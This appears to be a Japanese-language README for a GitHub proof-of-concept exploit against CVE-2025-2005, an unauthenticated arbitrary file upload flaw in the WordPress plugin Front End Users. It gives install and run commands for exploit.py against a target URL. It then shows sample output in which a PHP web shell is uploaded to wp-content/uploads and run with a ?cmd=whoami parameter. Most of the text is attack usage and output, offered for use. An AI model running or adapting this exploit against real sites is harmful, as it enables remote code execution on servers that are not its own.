
WordPress FEUP 任意のファイルアップロードエクスプロイト (CVE-2025-2005)
このリポジトリは、WordPress プラグイン Front End Users (バージョン 3.2.32 まで) の Proof of Concept (PoC) エクスプロイトを提供します。このプラグインは、登録フォームにおける MIME/ファイルタイプの検証が欠如しているため、任意のファイルアップロードが可能です。これにより、認証されていない攻撃者が悪意のあるファイル (例: ウェブシェル) をアップロードし、サーバー上でのリモートコード実行 (RCE) につながる可能性があります。
/register/
/signup/
pip install requests beautifulsoup4
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005
python3 exploit.py --url http://target.com --user hacker --password pass123
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami